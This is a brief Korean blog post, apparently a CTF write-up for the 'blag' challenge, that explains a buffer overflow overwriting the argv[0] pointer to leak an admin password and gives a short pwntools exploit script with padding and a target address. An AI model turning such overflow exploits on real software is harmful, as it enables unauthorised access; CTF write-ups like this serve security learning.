-
TJCTF blagCTF 2017. 1. 14. 21:12
이런문제 풀지마삼 실력 안늘음
풀거찾아보다가 찾은건데 너무 쉬워서 failed 그냥 롸업 써놔야겠다.
adminpassword를 구하는문제인데, 그냥 간단하게 오버플로가나는데 argv[0]포인터를 건드릴수있음
/home/ctfd/blag 라는 argv[0] 포인터가 있다. 이걸 이용해서 뭘 하냐
ㅎㅇ 포인터이거로 바꾸면 릭가능
1234567891011121314from pwn import *p = process("./blag")print p.recvuntil(">")p.sendline("add")p.sendline("a")p.sendline("a")password = 0x804B080payload = "A"*296payload += p32(password)p.sendline(payload)p.interactive()cs 'CTF' 카테고리의 다른 글
pwnable.tw seethefile (0) 2017.01.23 pwnable.tw unexploitable (0) 2017.01.22 HITCON CTF sleepy_holder (0) 2017.01.11 H3X0R CTF train_busan (4) 2017.01.10 H3X0R CTF comment (0) 2017.01.09